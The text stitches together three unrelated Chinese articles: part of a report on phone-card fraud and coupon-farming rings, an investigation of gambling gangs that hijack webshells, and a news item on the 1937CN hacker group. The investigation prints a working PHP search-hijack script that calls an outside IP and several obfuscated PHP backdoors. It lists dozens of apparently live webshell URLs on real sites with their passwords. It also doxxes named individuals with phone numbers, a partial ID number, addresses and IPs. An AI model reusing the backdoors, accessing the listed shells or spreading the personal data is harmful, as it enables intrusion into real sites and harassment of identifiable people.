小C透露,现在比较知名的软件平台有:Thewolf、金江和星辰。

以Thewolf为例,一般卡商入驻,都需购买他们专业的卡池和猫池。

卡越多,购买设备的价格越低,相应分成比例越高。

软件平台的后台上,可看到各个项目的收费标准,注册一个新的微信号,只需要2.2元。

而一些著名的理财平台,也出现在项目列表中。

目前,较大的平台上,日均有上万个项目在运行,对接数百个卡商,可操纵上百万张卡。

在Thewolf平台上,也公开招收“开发者”。

所谓的“开发者”,大部分都是黑客,他们给平台提供软件,并从其中提成,最高可达25%——这个方式是黑客小C喜欢的,他不需要公开揽客,深藏幕后。

“通常开发一款软件的分成,也有几万元”,小C称,他一个月收入,轻松能达到十几万。

“这些平台,年收入都是千万级别”,小C称,目前市面上,类似的平台大概有几百个,已挣得盆满钵满。

04?攻防大战

这条产业链,就此形成完整闭环。

前端,刷客们去搜集信息,寻找平台漏洞,并消化赃物。

中端,卡商提供手机号,并滋养卡。

后端,黑客编写软件,通过平台公开招商。

每个人,各司其职,默契配合,提供自己的最大价值。

锦佰安曾和刷客多次正面交锋,负责人风宁统计,这条产业链上,至少有百万人参与其中,每年产生百亿级别利润。

他们瓜分这块百亿蛋糕,组成了互联网时代最大刷客军团,他们是羊毛党的帮凶,是欺诈大军的先头部队。

黑产军团是互联网时代的产物,并在两个高潮中迅速崛起。

第一个高潮,就是电商时代。

注册就送优惠券、代金券、打折卡,刷客通过软件批量注册后,获得奖品,再以打折的价格往外售卖,从中赚取差价。

一年前,聚美优品曾推出一次“零元购”活动。活动开始后,正常的用户几乎都无法挤进活动页面,礼品不到一个小时便被抢空。

聚美优品CEO陈欧发布微博,痛斥遭遇黑客攻击,“有黑客批量注册小号刷礼品,一个地址一千单”。

这不过是电商平台遭遇的,再普通不过的一次攻击。

第二次高潮,就是互联网金融的兴起。

业内都将2013年称为P2P元年,最疯狂的时候,几乎每天都有几家平台成立。据网贷之家数据,截止今年5月,P2P网贷行业累计平台数量达到4080家(含停业及问题平台)。

最早期,P2P为了获客,动辄几十上百的红包和代金券赠送。

简直成了黑产的饕餮之宴。

“最开始只需要绑定银行卡就可以将钱取出来”,小C从网络上大量购买银行卡,软件也可以完成绑卡操作,“就像复读机一样,将一段操作流程录下来,不断复制”。

就在去年,一百多家P2P公司遭到黑客攻击,损失惨重,光是深圳、浙江两地就有20多家跑路。

刷客大军就如蝗虫过境,一些平台分秒间被薅干。

此后,互联网平台开始注意到黑产大军的存在,不断加固堤坝,重新设定规则来阻杀——比如,身份证和银行卡的姓名必须相同、同卡同出、投资金额后才可使用代金券等。

规则越多,机器批量操作的可能性越小。于是机器刷客渐渐被人工羊毛所取代。

第二客栈的创始人,网名叫“包子”,曾是羊头级别的人物。

他组建了几大QQ羊毛群,一旦哪个平台有活动,一呼百应,羊毛大军集体出动。

“2014年是羊毛党的巅峰之年,可以闭着眼睛去投,稳赚不赔”,包子说,然而,黄金时代转瞬即逝,很快进入低迷时代。

网贷圈名人“网贷曾经”见证了这段历史,2015年开始,平台开始规模性抵御羊毛党和刷客。

比如,一些平台做活动,投资100元,可返10元的代金券。

投资时并没有设任何门槛,可到了提现的时候,就需要“刷脸识别”,和身份证匹配者,才可将钱提出。

“一个羊毛党手中,一般都有5张左右的卡,有亲戚朋友的,也有从网上买的虚假资料和银行卡”,羊毛党频频遭遇“反被薅”。

此时,专门抵制刷客和羊毛党的安全公司开始出现,联合平台进行绞杀。

风宁想到了一个有意思的方式,来狙击刷客。

既然软件平台是号码的集散地,可以使用“爬虫”技术,将号码从软件平台爬出来,加入黑名单中。

如果遇到这些号码,自动拦截,就能形成防御壁垒。

锦佰安通过这种方式,监控所有软件平台,爬到了2千多万个手机号码。

实际上,黑市上流动的卡,要比2千多万更多,“因为还有很多小作坊,卡和软件不在平台上流通”。

风宁对某个平台爬到的号码,进行深入分析,发现这其中,联通号码最多。

即便有这份黑名单,也无法一劳永逸。这个黑产大池中,不断有号码被淘汰,新的号码流入。

“因此要对这些软件平台实时监控,随时更新黑名单,”风宁称。

“实际上,制定一些规则,可以杜绝大部分低等刷客,”风宁从“入侵者的角度”,制定了十几条规则,拦截刷客。

比如,批量注册的号码,大多是连号,如果同一个IP、同一个时间段,出现大批量连号,可能就是“高危区”,可进行拦截。

但攻防酣战之间,双方实力都在增长。

黑产在联合绞杀中,开始不断迭代软件和设备。

据小C透露,目前,软件和人工开始相互配合,可以批量操作的环节用机器,个性化操作的环节,人工填补。

这是刷客军团史上,最可怕的一次技术革命,“完全可以做到以假乱真”。

“这对风控,带来极大挑战,此时战况已升级,不在是人机对抗,而是人与人之间的战争,”风宁认为,这个阶段,防御者唯一的胜算,就是需要手上掌握足够多的黑数据,进行威胁预警。

这场大战,似乎刚进入高潮阶段

05?相互供养

攻防大战,只是技术上的博弈,但两者间微妙的共生关系,才是这个黑产链条生生不息的根源。

存在即是合理,他们诞生在这个激荡的时代,也寄生在这个时代,相互供养。

“实际上,很多平台希望我们去薅羊毛”,申宏远在行业侵染多年,与平台间那种微妙的默契,他一直拿捏有度,“平台故意留下漏洞,就是为了增加注册量和业务量”。

平台和刷客们,隔着那层窗户纸——谁都不捅破,各取所需。

每个平台之间,都有两股势力的博弈:有时候是运营部门和高层,他们需要给领导上交一份“完美的数据”;有时候是高层和VC投资人,他们需要向VC证明业务繁荣,以拉升估值。

为了圆这个谎,刷客是不二之选——况且他们不吝迭代,技术日渐精进。

曾经有平台主动找到申宏远,让他帮忙完成“十万”的注册量。

一些羊毛党,也和多个平台结为“盟友”,对方发布促销活动,都会知会一声,“欢迎来薅”。

申宏远认为,这个行业不仅不会衰败,反而会随着互联网的发展,更加兴盛。

“表面对我们恨之入骨,不惜重金绞杀,暗地里又故意给我们留下后门”,这个90后的小伙,看起来极为老成,在见不得光的地下黑产中,他悟出了自己的人生哲学。

他说:“人性终有见不得光的阴暗,我们就是他们黑暗中的欲望。”

(应受访者要求,本文部分人名为化名)

以上是欺诈盛宴第一篇,欢迎持续关注第二篇,关于骗贷群体的隐秘手段和黑产链条……

0day

中国最大的Webshell后门箱子调查,所有公开大马全军覆没

起因

对这件事情的起因是某天我渗透了一个大站,第二天进webshell时就发现,当前目录出现了新的后门,仔细一查,发现是博彩团伙干的,网站被全局劫持黑帽程序如下代码

set_time_limit(20);error_reporting(0);

define('u_b','/');

define('s_u','http:// 107.182.228.74/');

define('s_s','@haosou.com|360.cn| spider|360spider|so|360|sogou|sm.cn|[email protected]');

define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p());

function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{[email protected]('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d:@iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;}

if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%[email protected]",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s ){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}

https://www.so.com/s?q=%E5%A8%B1%E4%B9%90%E5%9C%BA&src=srp&fr=360sou_newhome&adv_t=d

看上去是针对360的,通过360去搜索site网站赌博相关的关键字出现的结果我惊呆了!!!!居然非常多的站被劫持,而且其中包括我渗透测试的不少站,看上去像是搜索引擎自己控制的排名一样,其实是非法分子利用了搜索引擎的排名算法规则。通过收录时间发现在2014年开始出现的,也就是说这个问题已经存在了多年之久,至今才暴露出来。

接下来我就开展了所有疑问的调查,因为这些东西被利用对社会影响实在太大,不仅仅我是唯一的受害者,而是这个安全圈子的所有人。

调查

找到幕后团伙

查大马问题

分析团伙的后门特征

1.我对我手里的shell进行了一遍梳理,首先是对后门进行新的地址修改,在原来的后门地址放上了js代码,该段代码记录的是相关指纹信息,以及各大网站的json获取。此时就是静静的等待。

2.我对大马又进行了一遍分析,把所有代码读烂了也没任何问题,同时也对马进行了抓包分析,没有任何外部请求。因为一直没发现问题,所以我特意进行了长达一周的数据包监控,还是没有任何结果。这时候就非常纳闷,既然马没有问题,为什么人家可以获取到我的所有后门?难道是我的电脑被入侵?我的网络环境除了http之外,不能做任何协议请求,而我的后门都保存在这台linux里,这点也可以排除。只好再想想是不是哪里疏忽了。

3.被该团队劫持过的站,我都检查了一遍,之后我发现,每个站的所有文件创建时间都会被他们更新到入侵时间,这刚好符合了特征,也就是刚被他们入侵过的站。

如图特征,几乎每个站被入侵后所有创建时间都会更新一次。

11.PNG

之后对他们自己的后门进行了采集样本,新的进展出现了,一共发现2波不同的团伙,但使用的大马均为一类。(见附件1)

我对他们的马进行了解密审计后发现,他们自己记录大马后门的箱子地址为api.fwqadmin.com,因为有了新的线索,所以只能暂时保存,后面再对这个进行渗透。

进展

经过两天的等待,终于得到了该团伙的指纹信息以及QQ号,然后我就开启大神模式进行社工,之后基本确认此人真实信息(圈内叫老袁)。然后我申请了一个QQ小号,以匿名的方式加了一些博彩导航网站上的qq,在QQ上问了好几个人,都没有结果,后来我干脆以做博彩的名义和他们进行深度沟通,通过沟通发现该团伙的shell都是收购来的,一个月收入几百万人民币,是否真实就不得而知了。目前基本可以确认我的判断错误,老袁就是唯一的线索。

我对被该团伙做劫持的所有站进行了采集,还有跳转到他们导航的域名。首先对那些不是我的站进行了渗透入侵,采集到后门样本,看到里面有个和我类似的大马,但是核心变量结构不一样,我下载回来进行审计抓包同样没问题,后来通过对比特征,发现大马请求的POST参数都是一样的,例如gopwd=密码&godir= ,马都没异常,这时候初步判断是上层网络出现了问题,通过流量提取到大马特征的地址,如果真是这样就太可怕了。

我联系到老袁了,和他进行了一些盘问式的沟通,感觉到他很害怕,他说别搞他,他以前做诈骗的。后来发了一些shell地址给我来讨好我,如下列表,下面是星际团队的:

http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&f=k ? ? ? ?HyhbokskjGrsjhjM8hsL_hgshgK

http://www.212200.com/mocuz/downapp/images/pclife.php?1=2&Z=Opm ? ?Hys7sa5wrKKO00GSBtashras28asNNmsn18

http://www.dailiba.com/about/index.php?v=1 ? ? ? ? ? ? ? ?Tmbdcuu123uualltop

http://www.chinaunix.net/mysql/tmp/hoem.php?1=1&f=k ? ? ? ? ? ? ? ?HyhbokskjGrsjhjM8hsL_hgshgK

http://domarketing.org/phpsso_server/caches/commons/index.php?v=2ss ? ? ? ?ytsadAskLs27ssJsjdasd2sS

http://www.baby-edu.com/member/admin/include/fields/box/index.php?v=qw ? ? ? ? ? ?ytsadAskLs27ssJsjdasd2sS

http://www.hongze365.com/data/avatar/1/f/1.gif?1=2&GSW=Curry ? ? ? ? ? ?TTrsfsdh748jsusyKKOystw889sbct

http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE ? ? ? ? ? ?77iasyw00aUUSImmsb64682301jMM!!!Qko

http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&GSW=Curry ? ? ? ? ? ?TTrsfsdh748jsusyKKOystw889sbct

http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&f=k ? ? ? ?HyhbokskjGrsjhjM8hsL_hgshgK

http://www.dailiba.com/about/index.php?v=1 ? ? ? ? ? ? ? ?Tmbdcuu123uualltop

http://www.hubeifc.com/phpcms/modules/content/classes/commentl_api.class.php ? ? ? ?UTF8

http://domarketing.org/phpsso_server/caches/commons/index.php?v=2ss ? ? ? ?ytsadAskLs27ssJsjdasd2sS

http://www.huse.edu.cn/phpsso_server/phpcms/languages/en-us/condif.inc.php?v=sd ? ? ? ?ytsadAskLs27ssJsjdasd2sS

http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE ? ? ? ? ? ?77iasyw00aUUSImmsb64682301jMM!!!Qko

http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&GSW=Curry ? ? ? ? ? ?TTrsfsdh748jsusyKKOystw889sbct

http://www.hongze365.com/data/avatar/1/f/1.gif?1=2&GSW=Curry ? ? ? ? ? ?TTrsfsdh748jsusyKKOystw889sbct

http://bbs.fish3000.com/mobcent/app/config/discuz.bak.php?1=2&TD=SAS ? ? ? ? ? ?UUys78tasdRhasd00iasdyTGGgahs

http://bbs.dqdaily.com/uc_server/install/images/close.php?1=2&sha=shan ? ? ? ? ? ?7yJJN730%1&uqYYqwhkkasII17vcxQ1mzaPQhn8!P

http://www.aquasmart.cn/member/fckeditor/editor/css/friend.php?1=1&f=k ? ? ? ? ? ? ? ?HyhbokskjGrsjhjM8hsL_hgshgK

http://www.yangji.com/member/editor/fckeditor/editor/dtd/fck_dtd_test.gif?1=2&BAT=HEHEDE ? ?77iasyw00aUUSImmsb64682301jMM!!!Qko

http://www.shenma66.com/nvzhubo/baorurekuxiongmiaonvzhuboMinanaxingganrewuzhiboshipin/inde.php ? ? ? ?7yhaw1woAksmjh892jsasd1sajg

http://www.shenma66.com/nvzhubo/baorurekuxiongmiaonvzhuboMinanaxingganrewuzhiboshipin/inde.php ? ? ? ?7yhaw1woAksmjh892jsasd1sajg

http://bbs.taisha.org/pms/data/templates/wind_homes.tpl.php?baidu=Google ? ? ? ?erk12hj3nfher71h3j4k132bnnebr3hg4134

http://www.168w.cc/api/map/baidu/baidu.php?1=1&f=k ? ? ? ? ? ? ? ? ? ?HyhbokskjGrsjhjM8hsL_hgshgK

http://www.dibaichina.com/goldcard/data/alliance/images/GHMC.php?1=1&baidu=.com ? ?Tmbdcuu123uualltop

http://www.ijcz.cn/module/brandjoin/join.claos.php?1=2&BK=ManUtd ? ? ? ? ? ?YIasdwj78954qwtyVVJsarwhahuyrwvsllps2

http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE ? ? ? ? ? ?77iasyw00aUUSImmsb64682301jMM!!!Qkos

http://www.hotpoll.com.cn/i/index.php?v=111 ? heiheideheihei

星际团队是什么鬼?难不成又是做博彩的?通过与老袁进一步沟通后发现,这些shell都是另一个做博彩的,他说是博彩圈子最大的团伙,说实话,我挺兴奋的,发觉这件事越来越有趣了,我倒想看看这是些什么人。

不过现在我的目标还在“老袁”身上,因为我得找到卖他shell的人,经过一番较量之后,我得到到了真相,我也叫他提供了交易证据。此处略去不表,我会放到后面取证部分。

虽说有了shell卖家的联系方式,可是迟迟没添加上。这时候我又采取了另一种思路,钓鱼取证,老套路,还是在大马地址上js json,上面贴了几段字《add me email:[email protected] I will give you all webshell》让老袁发给让他,以便他主动联系我。

后来他果真访问了几个webshell的地址,我也抓取到了他的真实PC指纹以及代理的指纹以及QQ昵称。之后他主动找到我,问我是不是星际团队的,并说收到我发的邮件了。这时候我就很好奇了,莫非星际团队也找到他了?然后他就来恐吓我,说要抓你们(星际团队),已经调查了星际团队一年了。

这时候我心一想,水真深,查来查去的到底是谁在查谁呢。不过他肯定是瞒不过我的,毕竟我有他卖shell的证据,不过意想不到的是他说:“我背后都是省厅的人,你以为这些shell都是怎么来的?都是在国家机器提取的。”我勒个去,国家会干这种事吗?国家提取网站记录我是信,isp保留日志也是1年,至于批量提取全国网站访问特征拿出来卖这我就不信了,要么就是黑客入侵到了运营商去提取出来的。

经过了一些沟通后,他居然一直说我是星际团队,就把我拉黑了。后来我就主动加他说:“你是河北的吧,我已经有你犯罪证据了。”他就怕了,主动加我认怂,还发了打包好的webshell给我。这时候我又惊呆了,这简直是逆天的节奏,居然有上万个webshell和国内所有cms的后台登录密码,其中包括dedecms discuz wordpress emlog ecshop empire jieqi phpmyadmin uchome ucenter php168等几乎是全国所有cms都存在,而且每种的数量去重复都在上万条,我会上传一部分在附件。他说他背后的人的有几十万的discuz后台登录账户密码,我测试了他发我的一些后台,均可以登录,其中信息包括登录的fromhash uid 用户名、密码 、安全问题 、安全答案,而且都是前一天的。

到底是什么东西能记录如此多东西而且还没有一点异常。我看到其中也有我使用过大马的很多站,里面还有上万条webshell,其中有大量我的站,还有大量各种类型的大马和不同密码,看样子并非我一个人受害,我进行特征匹配出来,大概有上百人的大马不同特征。而且他发我的只是很小一部分,叫我给他钱才给我更多。这样一想他手里的资源都有几十万条了吧。他说他后面的人是技术团队,还有各种0day,是给国家干的,手里有全国的webshell,如果真是他说的这样,那资源为什么出现在他这里了还拿出来卖?很明显是撒谎怕我查他。我不相信,决定继续调查。

经过几天的分析,这波数据和以前wooyun曝光的出来的九宫格(大家可以回溯一下2013年的http://www.dedebox.com/core/centerxxxxx.php)是一样的,我对当时的数据也进行了打包分析,发现这波shell里面还存在部分的重复数据。而当前这个大马和当时九宫格的登录参数特征基本都是在Spider PHP Shell(SPS-)这款代码的基础上修改的,也就是说除了后门本身,这伙人还通过其他渠道来提取的大量webshell,之后通过webshell去运行了记录后台数据的代码写入内存中僵死代码,保持着只要不换服务器就常年不死的状态,这也还是猜想,因为后台数据里面有些站的确是九宫格重复的,如果是九宫格后门的话我就有新方向可查了,以上是我进行的大致分析和调查过程。下面我就不描述过程,就直接提供数据记录以及取证结果,交给警方去完成了。

取证

以下这几个是团伙一(老袁)跳转到的域名:

116305.net

559160.net

618309.net

786077.net

551809.com

www.919808.net

www.226830.com

均出自同一团伙的,只是域名不同,每个站跳转到不同的域名分散风险罢了,其中劫持代码里面的ip都是一样107.182.228.74,看得出来很老练。

这几个是模拟蜘蛛抓取劫持内容的bc logo图片地址的ip:

210.126.27.70

pic.root1111.com

58.96.179.132

104.202.66.226

此团伙工作环境ip,都在马来西亚(时间在10月9-号到10月26号以内的)

2016-10-26 13:00:01 ( IP 14.192.210.34 ) 马来西亚Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864

2016-10-26 13:20:09 ( IP 103.6.245.143 ) 马来西亚Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864

2016-10-26 13:00:25 ( IP 175.141.34.101 ) 马来西亚Windows NT 6.3, Chrome 50.0.2661,QQBrowser 9.5.9244, 1920×1080

2016-10-24 13:59:17 ( IP 175.136.41.251 ) 马来西亚Windows 7 & 2008 r2, MSIE 49.0,Firefox 49.0, 1536×864

2016-10-25 14:28:11 ( IP 175.143.101.241 ) 马来西亚 Windows NT 10.0, Chrome 47.0.2526, 1920×1080

2016-10-26 13:20:09? ( IP 103.6.245.143 ) 马来西亚Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864

14.192.211.116? 马来西亚

14.192.211.223 马来西亚

175.138.234.137马来西亚

工作PC指纹(分析此团伙有5个人):

Windows NT 6.3, MSIE 11.0,QQBrowser 9.5.9244, 1920×1080, 224 色

Windows 7 & 2008 r2, MSIE 49.0,Firefox 49.0, 1536×864

Windows NT 10.0, Chrome 47.0.2526, 1920×1080

Windows XP, MSIE 6.0, 1126×800

Windows Server 2003, Chrome 49.0.2623, 1920×1080

Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864

此团伙首领信息

QQ 474304849 641075512

真实姓名:袁立 重庆人

手机号:15998984721? 手机MAC:18:9E:FC:11:2C:70? 马来西亚手机号:060136958999

他的网站:

www.badongedu.com

www.7cq.tv(他建立的地方论坛)

api.fwqadmin.com(这个是他自己正在使用的大马自己留的后门收信地址)附件会有大马样本有兴趣的可以看看

Email:root@7cq.tv [email protected]163.com

在国内的历史IP:

222.178.225.146(重庆市 电信)

222.178.201.12(重庆市 电信)

27.11.4.19(重庆市 联通)

27.10.36.56(重庆市 联通)

113.204.194.202(重庆市 联通)

119.84.66.14(重庆市 电信)

61.161.125.77(重庆市巴南区 时代e行线网迷俱乐部李家沱店A/B馆)

国内的历史PC信息:

mac:90-2b-34-93-ad-73

操作系统:Microsoft Windows XP

显卡:NVIDIA GeForce GT 610

CPUAMD Athlon(tm) II X4 640 Processor 3325HZ

团伙成员信息就没去调查了,找到他就可以了。

WebShell卖家(一切安好)信息

VPN代理 :

110.10.176.127? 韩国

2016-10-24 22:26:37 ( IP 211.110.17.189 ) 韩国

(自己比特币购买的主机搭建)访问时间10月9号

真实IP:

2016-10-26 16:23:27 ( IP 121.18.238.18 ) 河北省保定市 上海网宿科技股份有限公司联通CDN节点 Windows NT 10.0, Chrome 47.0.2526, 1920×1080

27.186.126.196 河北省保定市 电信? 真实ip可能性更大

浏览器指纹信息 ,一共3个不同的,但应该都是同一个人,可能电脑比较多,因为他有2个QQ

Windows NT 6.3, Chrome 45.0.2454, 1366×768 真实指纹

Windows NT 10.0, Chrome 47.0.2526, 1920×1080

Windows NT 6.3, Chrome 45.0.2454, 1366×768, 224 色, 未装 Alexa 工具

Windows NT 10.0, Chrome 53.0.2785, 1600×900, 224 色,

QQ2436449670? 3496357182

Telegram:@haorenge888

此人现在开的奥迪A8,真是土豪啊,看来赚了不少钱还能逍遥法外,是河北口音即河北人。

如要查到webshell来源只有查他的幕后渠道。

他与老袁的交易信息:。

22.PNG

33.PNG

44.PNG

77.PNG

星际团伙信息

使用过的域名:

wokeda.cn

www.98589.com

www.356388.com

chuan2828.com

cnzzz.pw

web-159.com

diyi1111.com

diyi2222.com

diyi3333.com

diyi4444.com

xinyu55.com

hongyihai.com

80268.com

5130898.com

maimai789.com

zhenyi58.com

xwgy999.com

统计代码

document.writeln("<div style=\"display:none;\"><script language=\"javascript\" type=\"text\/javascript\" src=\"http:\/\/js.users.51.la\/18737987.js\"><\/script><\/div>");

var hmt = hmt || [];

(function() {

var hm = document.createElement("script");

hm.src = "//hm.baidu.com/hm.js?c1c374db31da00a022c09301920eff78";

var s = document.getElementsByTagName("script")[0];

s.parentNode.insertBefore(hm, s)

})();

callJump()

}

}

} if (init_flag == "93989") {

call_init_error()

}

可以通过他们网站的统计代码分析登录的记录马来西亚的ip就是真实ip

搜索各大搜索引擎爬取跳转到他们的站,和快照特征,竟然有超过1000个被他们劫持过的网站,其中包括了不少全国最大的新闻网站如ifeng.com china.com.cn,如果警方需要我可以提供列表

星际劫持团伙在马来西亚,成员大概6个人左右,团伙渗透的手段包括但不限于鱼叉,社工,爆破,xday,漏洞均会爬虫批量去入侵,每次入侵后喜欢留大量的后门,防止权限掉了。

成员分工:

二名核心技术渗透人员(其中一名主要负责攻击,入侵大型新闻类型站点。一名主要负责代码审计,以及内部一系列php的开发,包括劫持程序,外兼入侵一些中型权重站点)

一名普通技术渗透(对扫描出漏洞的垃圾站点进行入侵)

二名负责挂劫持代码,如果站掉了就会去恢复

一名负责bc网站上的市场兼财务,收账出帐以及收站

核心成员在2015年12月份从马来西亚回中国至2016年2月左右返回马来西亚

以上是我通过圈内人员采取一些手段了解到的信息,因为这个团伙安全意识比较高,没得到太多真实信息,但是有一位给他们做过外包的黑客可以顺藤摸瓜

星际使用过的QQ :3151094164 最早的时候

著名的美女黑客:YingCracker

QQ:253778984 1132440325 984754551

手机: 13665012347 or 13665012374

姓名: 江XX

支付宝: [email protected]

地址: 上度路-牡丹园-505

所在省份: 福建

所在城市: 福州

所在地区: 台江

找到这位美女黑客去了解下此团伙的情况应该会有进展

他们的后门样本:

<?php

@$A='Acc';$p='_';$o='PO';$s='S';$t='T';$a='as';$b='sert';$Acc=$a.$b;@${$A}(${$p.$o.$s.$t}[ziiuioxs]);

echo 'error';exit;?>

<?php

@$ksvSGu= "\x73tr\x5f\x72e\x70l\x61\x63e";

@$xRec= @$ksvSGu('wcaSq','','awcaSqrrwcaSqawcaSqywcaSq_filwcaSqter');

@$SOet= @$ksvSGu('wZTB','','aswZTBsewZTBrwZTBt');

@$xRec((array)@$_REQUEST['rretgscr'],@$SOet);

?>

<?php

if($_GET['jumpvv']){

$tu="TVFsnZG9vcnB5J";

$mzd="10pOwoK";

$fc="Cg";

$tnz = str_replace("rn","","rnstrnrrn_rrnernprnlrnarncrne");

$nu="pqldmqFsKCRfUE9";

$qwb = $tnz("u", "", "ubuausue6u4u_udueucoudue");

$lcq = $tnz("j","","jcrjejatej_jfujnjcjtjiojn");

$htx = $lcq('', $qwb($tnz("q", "", $fc.$nu.$tu.$mzd))); $htx();}

?>

<?php

@$EuTsNl="p"."r"."eg_r"."epla"."c"."e";

@$EuTsNl("/[email]/e",$_POST['iiaqffg'],"error");

?>

<?php

$ad = '|';$ad .='.';$ad .='*|';$ad .='e';

@preg_filter('|.*|e', $_REQUEST['andyzhengs'], '');

?>

部分我直接复制到文件夹里面了

收信地址嫌疑人信息

这次事件的特征和九宫格类似,因此我对2013年的事件进行了梳理并且对这个人进行了深入调查,可以确认两个人,一定是其中一个人干的。

如果不是大马的问题那么也可以从这两个人中来了解到本次后门事件的内情,唯一的不确定性就是箱子的大马看不出任何问题。因为和他们之前后门数据实在太像了,几乎概括了所有的cms,记录的后台有些也是几年前被入侵过的九宫格箱子里面的,至今还在记录着新的内容

嫌疑人一:

原来的吐司成员spider,也就是spider大马的创始人,当时他也留过后门,追溯起来都是2011年的事情,经过调查,那时候他所公开出去的shell大马就存在后门,而且也被他本人大量利用做游戏劫持收录挂马,传闻在2012年就赚到了几百万身价,后来就一直低调出了大众的视线,在圈子销声匿迹了。不过现在调查有新的发现,他一直在活跃着,在今年其中登录过历史邮箱,续费过后门的收信域名,因为他没办法换域名,换了就收不了shell。

Id: iamspider? iamsunchao

真实姓名:孙x

年龄:29岁(不确定)

就读过:自贡荣县富西初级中学

户籍:成都 西昌人

QQ:80937430(真实QQ)? 862262949(小号)

历史IP(可能已经过时了)

222.215.38.109(四川省内江市 电信)

61.157.123.56(四川省凉山州西昌市 电信)

222.215.39.131(四川省内江市 (隆昌县)电信)

222.209.198.201(四川省成都市新都区 四川音乐学院附近蓝天云网吧)

嫌疑人二:

圈内的大神:toby57,曾经和他还打过交道,说是在给国家做事了,有点不太像是这件事的主谋,但是这个dedebox.com域名所有人就是他,而且他的能力足够干这样的事情

邮箱:[email protected] 也是他最常用的im

历史ip

171.212.206.46(四川省成都市 电信)

220.166.52.45(四川省绵阳市 电信)

222.209.139.66(四川省成都市 电信)

220.166.52.45(四川省绵阳市 电信)

125.66.99.211(四川省南充市 电信)

61.157.97.82(四川省绵阳市 西南科技大学)

112.192.70.251(四川省南充市 联通)

125.65.97.134(四川省绵阳市 电信)

61.157.97.85 (四川省绵阳市 西南科技大学)

182.139.60.17(四川省成都市 电信)

手机号:15208341433

姓名:杨xx

身份证号:5116211989050625xx(四川省岳池县)

所在城市:乐山

就读过:四川省绵阳市西南科技大学

结论

目前其实也没什么结论,从何泄漏的全国的所有大马以及各类cms后台后门还是个谜,因为能力太菜了。。。但是我相信这个谜警方可以解开,你们赋有足够的权利和使命去完成打击。否则对网民的危害太大了,那些webshell被拿去做博彩做诈骗危害就很大了,几乎一个菠菜行业一个诈骗行业的黑帽seo源头都来于此,如果不及时阻止危害还会无限扩大。

另外要去看被入侵的站点请到360搜索,娱乐场看最新一天收录

https://www.so.com/s?q=%E5%A8%B1%E4%B9%90%E5%9C%BA&src=srp&fr=360sou_newhome&adv_t=d

温馨提示:使用过任何大马的帽子注意检查下自己的shell,看看里面的文件时间是否统一为最近的创建时间

ps:附件为webshell部分列表,大约几千条随机copy。

传送门:https://1drv.ms/u/s!AhMf1bUbIk7UanjRbtWlwOyebhU

部分受害域名列表(这个基数是去重复1W多条,未去重复大概20万条,其中的信息量与附件类似,一个站会记录所有的管理员登录账户密码,包括webshell的存在)

传送门:https://1drv.ms/t/s!AhMf1bUbIk7Ua72FwZXZuVMX3fw

大家在拿到受害列表可以搜索下手里的webshell域名,如果存在那么就注意及时处理掉,以免被不法分子给你造成危害。

*原创作者:为了作者安全,已经匿名处理,转载请注明来自FreeBuf(FreeBuf.COM)0day

中国著名黑客组织1937CN宣布网站关闭China's famous hacker organization 1937CN announced the closure of the site

独家专访│1937CN 停止解析,但爱国之路永不停息-安全圈

1937CN团队是一个神秘并且在中外网络大战中做出过巨大贡献的团队,对于团队的声明有网友质疑原因,而更多的是表示不舍。

中国网军1937cn团队简介:

中国网军1937cn团队1937CN 成立于2008年,主要由一些网络技术人员构成。 1937CN的创始人网名为“越南邻国宰相”!在2016年7月29日“越南遭受迄今最严重的黑客攻击事件”,

? 中国网军1937cn黑客事件:

2016年7月29日发生在越南两个最大机场的黑客事件引发震动。黑客通过攻陷机场电子显示屏及广播系统,散发“南海是中国的固有领土”等信息,给机场候机的乘客带来视觉和听觉上的冲击,造成的混乱远超常见的攻击网页等行为。黑客自称是“1937CN TEAM”,这是一个中国民间组织,但“1937CN”随即发表声明予以否认。

2016年7月31日,“越南邻国宰相”接受采访时表示,对于越南机场被黑事件,1937CN的立场是“不参与,不承认”。

? 中国网军1937cn团队宣布停止解析:

? ? 2016年8月28日中国1937cn团队运营网站发出公告,宣布1937cn团队停止解析!停止一切活动!

? ?中国网络1937cn团队创始人采访纪实:

中国白帽黑客团队1937cn创始人:越南邻国宰相 宣布1937cn团队停止域名解析,停止一切活动!在采访中1937cn团队创始人邻国宰相透漏,对于这次1937cn团队解散将面临一次彻底的转型!

